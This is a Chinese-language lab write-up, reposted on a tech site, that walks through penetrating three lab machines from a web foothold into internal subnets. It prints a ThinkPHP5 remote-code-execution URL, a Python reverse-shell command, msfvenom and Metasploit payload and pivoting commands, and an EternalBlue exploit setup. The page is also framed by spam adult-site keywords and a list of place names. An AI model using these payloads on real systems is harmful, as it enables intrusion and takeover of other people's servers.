最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

從web到內(nèi)網(wǎng)滲透的一次過(guò)程詳解

 更新時(shí)間:2021年09月30日 15:21:50   作者:https://blog.csdn.net/kukudeshuo/article/details/120533367  
本文非常詳細(xì)的描述了一次從web到內(nèi)網(wǎng)滲透的一次過(guò)程,并對(duì)每一步過(guò)程做了詳細(xì)的圖文示例及解析,有需要的朋友可以借鑒參考下,希望能夠有所幫助

記一次從web到內(nèi)網(wǎng)的滲透

拓?fù)鋱D

環(huán)境介紹

現(xiàn)在有三臺(tái)機(jī)器,分別為target1,target2,target3,里面分別有三個(gè)flag,每個(gè)flag的分值不同,需要通過(guò)拿下一個(gè)已知IP(target1)進(jìn)而向內(nèi)網(wǎng)里面進(jìn)行滲透,最終要成功獲得三臺(tái)主機(jī)權(quán)限

滲透過(guò)程

target1

使用nmap進(jìn)行掃描

可以看到開(kāi)啟了80端口
瀏覽器訪問(wèn)目標(biāo)靶機(jī)80端口

可以看到就是apache的默認(rèn)頁(yè)面
使用dirb進(jìn)行目錄結(jié)構(gòu)掃描

發(fā)現(xiàn)public頁(yè)面

可以看到是thinkphp5搭建的網(wǎng)站,thinkphp5曾經(jīng)爆過(guò)一個(gè)遠(yuǎn)程代碼執(zhí)行的漏洞,直接上網(wǎng)站尋找payload驗(yàn)證是否存在漏洞

http://192.168.109.181/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

可以看到確實(shí)存在漏洞,現(xiàn)在可以向網(wǎng)站里面寫入一句話木馬,然后用蟻劍去連接,這是一種方法,但是也可以直接去嘗試反彈一個(gè)shell到kali上

kali上執(zhí)行:nc -lvvp 4444
瀏覽器中執(zhí)行:http://192.168.109.181/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.109.128%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);

可以看到kali這邊成功反彈到了一個(gè)shell

使用python生成一個(gè)交互式的shell

查找一下flag

成功獲得第一個(gè)flag
使用msfvenom生成一個(gè)反向的shellcode

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.109.128 lport=5555 -f elf > msf.elf

使用python開(kāi)啟一個(gè)臨時(shí)http服務(wù)

靶機(jī)下載該shellcode

然后kali打開(kāi)msf,進(jìn)行監(jiān)聽(tīng)

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lport 5555
set lhost 192.168.109.128
exploit

然后靶機(jī)上給予shellcode執(zhí)行的權(quán)限后執(zhí)行該文件

可以看到kali這邊成功返回一個(gè)meterpreter

查看一下網(wǎng)絡(luò)配置

可以看到target1還存在一個(gè)網(wǎng)段
添加路由表

配置socks代理

use auxiliary/server/socks_proxy
exploit

配置proxychains代理鏈

vim /etc/proxychains4.conf

target2

掃描10.1.1.0/24這個(gè)網(wǎng)段是否還存在其他機(jī)器

use auxiliary/scanner/portscan/tcp
set rhosts 10.1.1.0/24
set ports 1-1000
set threads 50
exploit

可以看到該網(wǎng)段還存在一臺(tái)機(jī)器為10.1.1.150
使用nmap掃描10.1.1.150開(kāi)放端口

proxychains4 nmap -Pn -sT 10.1.1.150

可以看到也開(kāi)放了80端口
這里直接用瀏覽器去訪問(wèn)10.1.1.150的80端口顯然是不行的,不過(guò)火狐瀏覽器也是支持socks代理的

再次訪問(wèn)網(wǎng)站

查看robots.txt文件

找到后臺(tái)登入位置

直接使用弱密碼admin:admin登入成功

成功獲得第二個(gè)flag,找到模板位置,發(fā)現(xiàn)里面的源碼都是可以編輯的

寫入一句話木馬

然后使用蟻劍去連接,當(dāng)然直接去連接肯定也是不行的,不過(guò)蟻劍也是支持代理設(shè)置的

之后再正常去連接就行了,但是我這里不知道是環(huán)境問(wèn)題還是蟻劍的問(wèn)題,正常來(lái)說(shuō)這里是肯定能連接成功的,我試了很多遍都沒(méi)有成功,然后想著直接把那個(gè)頁(yè)面里面的源碼直接換為大馬,也是不行的,因?yàn)橐话愦篑R都是經(jīng)過(guò)作者編譯過(guò)了,直接復(fù)制過(guò)去肯定會(huì)有問(wèn)題,最后只能直接將大馬事先準(zhǔn)備在了網(wǎng)站根目錄下面,這里主要是為了體現(xiàn)內(nèi)網(wǎng)滲透,所以這里也不細(xì)說(shuō)
訪問(wèn)大馬

使用msfvenom生成一個(gè)正向連接的shellcode

msfvenom -p windows/meterpreter/bind_tcp lport=6666 -f exe -o 1.exe

然后通過(guò)大馬將shellcode上傳到目標(biāo)服務(wù)器

然后再次進(jìn)入之前打開(kāi)的msf

然后在大馬上執(zhí)行上傳的shellcode

可以看到kali這邊成功返回了一個(gè)meterpreter

查看網(wǎng)絡(luò)配置

可以看到還有一個(gè)網(wǎng)段10.1.2.0/24
將路由添加到路由表

run post/multi/manage/autoroute

taget3

掃描10.1.2.0/24網(wǎng)段是否還存在其他機(jī)器

use auxiliary/scanner/portscan/tcp
set rhosts 10.1.2.0/24
set ports 1-1000
set threads 100
exploit

這里掃描實(shí)在太慢,這個(gè)網(wǎng)段還有一個(gè)機(jī)器IP為10.1.2.250
然后再添加一層socks代理

use auxiliary/server/socks_proxy
set srvport 2222
exploit

配置proxychains代理鏈

vim /etc/proxychains4.conf

使用nmap進(jìn)行端口掃描

proxychains4 nmap -Pn -sT 10.1.2.250

根據(jù)掃描結(jié)果判斷操作系統(tǒng)為windows
再使用nmap的漏掃腳本進(jìn)行掃描

proxychains4 nmap --script=vuln 10.1.2.250

可以看到存在ms17-010,直接上msf尋找攻擊模塊

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.1.2.250
exploit

查找一下flag

三臺(tái)主機(jī)的權(quán)限全部那先,所有flag查找完畢,至此,滲透結(jié)束

以上就是從web到內(nèi)網(wǎng)滲透的一次過(guò)程詳解的詳細(xì)內(nèi)容,更多關(guān)于web到內(nèi)網(wǎng)滲透過(guò)程的資料請(qǐng)關(guān)注腳本之家其它相關(guān)文章!

相關(guān)文章

  • VSCode設(shè)置默認(rèn)瀏覽器打開(kāi)的兩種方式

    VSCode設(shè)置默認(rèn)瀏覽器打開(kāi)的兩種方式

    在使用vscode編輯器的時(shí)候,如果我們不設(shè)置默認(rèn)瀏覽器,那么直接打開(kāi)的是IE瀏覽器,在進(jìn)行頁(yè)面調(diào)試的時(shí)候無(wú)疑是有點(diǎn)麻煩的,這篇文章主要給大家介紹了關(guān)于VSCode設(shè)置默認(rèn)瀏覽器打開(kāi)的兩種方式,需要的朋友可以參考下
    2023-09-09
  • IDEA升級(jí)后Git拉取和推送的標(biāo)簽消失的解決方法

    IDEA升級(jí)后Git拉取和推送的標(biāo)簽消失的解決方法

    本文主要介紹了IDEA升級(jí)后Git拉取和推送的標(biāo)簽消失的解決方法,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2023-06-06
  • 瀏覽器緩存知識(shí)小結(jié)及應(yīng)用分析

    瀏覽器緩存知識(shí)小結(jié)及應(yīng)用分析

    了解瀏覽器的緩存命中原理,是開(kāi)發(fā)web應(yīng)用的基礎(chǔ),本文著眼于此,學(xué)習(xí)瀏覽器緩存的相關(guān)知識(shí),總結(jié)緩存避免和緩存管理的方法,結(jié)合具體的場(chǎng)景說(shuō)明緩存的相關(guān)問(wèn)題。希望能對(duì)有需要的人有所幫助
    2017-03-03
  • Cookie 的 SameSite 屬性小結(jié)

    Cookie 的 SameSite 屬性小結(jié)

    Chrome 51 開(kāi)始,瀏覽器的 Cookie 新增加了一個(gè)SameSite屬性,用來(lái)防止 CSRF 攻擊和用戶追蹤,下面在通過(guò)本文給大家詳細(xì)介紹下SameSite 屬性的相關(guān)知識(shí),感興趣的朋友一起看看吧
    2021-10-10
  • 網(wǎng)站性能優(yōu)化之HTTP請(qǐng)求過(guò)程簡(jiǎn)述

    網(wǎng)站性能優(yōu)化之HTTP請(qǐng)求過(guò)程簡(jiǎn)述

    網(wǎng)站性能優(yōu)化中首要的一條就是要減少HTTP請(qǐng)求,那么為要減少HTTP請(qǐng)求呢?其實(shí)有些HTTP分析工具可以幫我們了解當(dāng)瀏覽器請(qǐng)求一個(gè)資源時(shí)大致需要經(jīng)歷的哪些過(guò)程
    2011-12-12
  • 怎樣寫好commit?message提高業(yè)務(wù)效率

    怎樣寫好commit?message提高業(yè)務(wù)效率

    這篇文章主要為大家介紹了如何寫好commit?message幫助業(yè)務(wù)團(tuán)隊(duì)提高效率方法詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪
    2023-05-05
  • Git多人協(xié)同開(kāi)發(fā)緊急修復(fù)線上bug操作指南

    Git多人協(xié)同開(kāi)發(fā)緊急修復(fù)線上bug操作指南

    這篇文章主要為大家介紹了Git多人協(xié)同開(kāi)發(fā)緊急修復(fù)線上bug操作指南,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪
    2022-06-06
  • OpenStack?安裝?Keystone的過(guò)程詳解

    OpenStack?安裝?Keystone的過(guò)程詳解

    這篇文章主要介紹了OpenStack?安裝?Keystone,本篇主要記錄一下?openstack?queens?版本?keystone?組件的安裝過(guò)程,本文通過(guò)圖文實(shí)例相結(jié)合給大家介紹的非常詳細(xì),需要的朋友參考下吧
    2022-05-05
  • 有關(guān)將idea的系統(tǒng)配置文件移到其它盤激活失效的問(wèn)題

    有關(guān)將idea的系統(tǒng)配置文件移到其它盤激活失效的問(wèn)題

    這篇文章給大家介紹win7系統(tǒng)盤空間不足,發(fā)現(xiàn)idea2019.3 占3.4G,將idea的系統(tǒng)配置文件移到其它盤,激活失效的解決方法,本文給大家介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友參考下吧
    2020-11-11
  • 如何使用git reset進(jìn)行多commit合并

    如何使用git reset進(jìn)行多commit合并

    這篇文章主要介紹了如何使用git reset進(jìn)行多commit合并問(wèn)題,具有很好的參考價(jià)值,希望對(duì)大家有所幫助,如有錯(cuò)誤或未考慮完全的地方,望不吝賜教
    2025-04-04

最新評(píng)論

吴旗县| 四川省| 宽甸| 华坪县| 井冈山市| 花莲市| 漳浦县| 福建省| 额济纳旗| 浠水县| 开封县| 内乡县| 夏津县| 祁东县| 通化市| 承德县| 乌海市| 西和县| 宣威市| 衡阳县| 怀仁县| 赫章县| 随州市| 新平| 蒲江县| 太仆寺旗| 绵阳市| 佛冈县| 江源县| 遂平县| 佛坪县| 涿州市| 商城县| 尉犁县| 桐庐县| 平顶山市| 永平县| 南投市| 临邑县| 宾阳县| 井研县|